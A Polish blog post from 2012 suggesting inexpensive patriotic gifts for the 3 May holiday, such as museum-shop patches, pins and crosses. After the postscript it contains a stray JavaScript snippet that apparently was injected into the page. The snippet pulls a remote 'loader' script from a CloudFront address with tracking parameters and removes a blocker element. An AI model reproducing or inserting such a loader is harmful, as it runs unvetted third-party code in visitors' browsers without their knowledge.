Prezentuję patriotyczny wpis

3 maja 2012
P jak …

Dzisiejszy wpis miałam w planach dawno, dawno temu, a konkretnie rzecz biorąc prawie pół roku temu. To ciekawe, że wciąż pamiętam, iż 11 listopada ubiegłego roku chciałam napisać o patriotycznych prezentach. Ponieważ świętowanie tamtego dnia w naszym kraju przyćmiły wydarzenia absolutnie skandaliczne, nastrój patriotyczny mnie opuścił i powstał wtedy zastępczy wpis teoretyczny. Wiedziałam jednak, że kiedyś czas na ten wpis znów nadejdzie i dziś złożyło się o tyle dobrze, że patriotyczne prezenty pasują i do święta Konstytucji 3 Maja i do literki P w cyklu prezentowe abecadło.

Nie wiem jak Wy spędziliście dzisiejsze święto (właściwie to za chwilkę już będzie wczorajsze, bo trochę późno zabrałam się dziś za pisanie), ale jeśli tak jak ja byliście w Warszawie i to jeszcze w jej centrum to naprawdę można było poczuć dumę z bycia Polakiem! Wszędzie wisiały flagi (nie tylko w centrum, na moim osiedlu także – Pan M. wczoraj dzielnie zamocował flagę na naszym balkonie!), przed Pałacem Prezydenckim była świetna wystawa pt. “biało-czerwona na białym” – o polskiej fladze na krańcach ziemi czyli biegunach i najwyższych szczytach świata, a na przeciwko Pałacu stała długa kolejka osób chętnych do obejrzenia na własne oczy Konstytucji, której święto właśnie obchodzimy. Naprawdę był to piękny obrazek!


Właśnie w takim klimacie chciałabym zaproponować Wam kilka patriotycznych prezentów, które przydadzą się nie tylko w trakcie zbliżających się mistrzostw Europy, ale także bardzo ucieszą tych, którzy z własnej woli, a czasem pod przymusem (dawniej politycznym, dzisiaj raczej ekonomicznym) zamieszkali poza granicami Rzeczypospolitej. Oprócz typowo kibicowskich – koszulek, szalików i czapeczek, typowo alkoholowych – kieliszki, kufle czy po prostu rodzima wódka, osobiście bardzo lubię niewielkie rzeczy czyli naszywki i różnego rodzaju przypinki. Naszywki najczęściej spotykane są w formie flagi lub godła, ale Muzeum Powstania Warszawskiego ma też w ofercie bardziej oryginalne wersje (takie jak na poniższych zdjęciach). Za to w Muzeum Wojska Polskiego znajdziecie przypinki z orłem oraz krzyżyki patriotyczne, które na pewno bardzo spodobałyby się Panu M.

Naszywka z odznaką zgrupowania “Zośka” – cena: 5 zł (www.muzeum1944.home.pl)

Naszywka z odznaką zgrupowania “Parasol” – cena: 5 zł (www.muzeum1944.home.pl)

Przypinka MWP z orłem – cena: 5 zł (www.muzeumwp.pl)

Krzyżyk patriotyczny – cena: 51,50 zł (www.muzeumwp.pl)

Jak widać nie są to drogie rzeczy, a naprawdę mogą sprawić wiele radości, zwłaszcza osobom o zapędach militarnych lub naszym dziadkom i babciom z kombatancką przeszłością. W sklepikach przy Muzeum Powstania Warszawskiego oraz Muzeum Wojska Polskiego znajdziecie także sporo innych rzeczy, więc naprawdę warto do nich zajrzeć (choćby w internecie). Moim zdaniem sklepy przy muzeach (wszelkiego rodzaju) są jednym z ciekawszych miejsc do poszukiwania oryginalnych prezentów, zarówno na wyjazdach, jak i w naszych miastach rodzinnych.

P.S. Zdjęcia pochodzą ze stron www.muzeum1944.home.pl oraz www.muzeumwp.pl

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi:

Kategoria: , , , , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję ścienne dekoracje dla dorosłych

Następny

Prezentuję kolejny pojazd dla małych i dużych

Comments are closed here.